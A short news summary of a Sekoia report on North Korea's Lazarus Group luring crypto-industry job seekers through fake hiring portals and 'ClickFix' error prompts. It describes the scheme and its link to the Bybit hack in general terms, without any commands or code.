Lazarus Group Targets Crypto Job Seekers with "ClickFix" Social Engineering Scheme
North Korea's Lazarus Group has refined its cyberattack strategy by exploiting job seekers in the cryptocurrency sector through a new tactic dubbed “ClickFix,” as detailed in a Sekoia report. The group now targets non-technical professionals (e.g., marketing, business development) by impersonating major firms like Coinbase, Kraken, and Tether via fake job portals.
How ClickFix Works:
1. Fraudulent sites mimic hiring platforms, complete with application forms and video interview requests.
2. Users attempting to record videos receive fake error messages, prompting them to run malicious PowerShell commands disguised as troubleshooting steps.
3. This method exploits victims’ trust, as they believe they’re resolving technical issues rather than executing malware.
Evolving Tactics:
The campaign, linked to 184 fake interview invites and 14 impersonated companies, builds on Lazarus’ earlier “Contagious Interview” attacks aimed at developers. While ClickFocus focuses on psychological manipulation, the original campaign persists, suggesting the group is testing strategies across demographics. Both aim to deploy info-stealers through trusted channels.
Expanded Targets:
Lazarus now seeks access to sensitive data via roles beyond technical teams, highlighting a shift toward exploiting individuals with internal organizational access.
Linked to Bybit Hack:
The FBI attributed Lazarus to a $1.5 billion hack on crypto exchange Bybit, where attackers used fake job offers to plant malware (“TraderTraitor”) via poisoned trading software, enabling private key theft and unauthorized transactions.
Conclusion:
Lazarus continues to refine its social engineering tactics, blending technical sophistication with psychological manipulation to exploit the crypto industry’s competitive job market.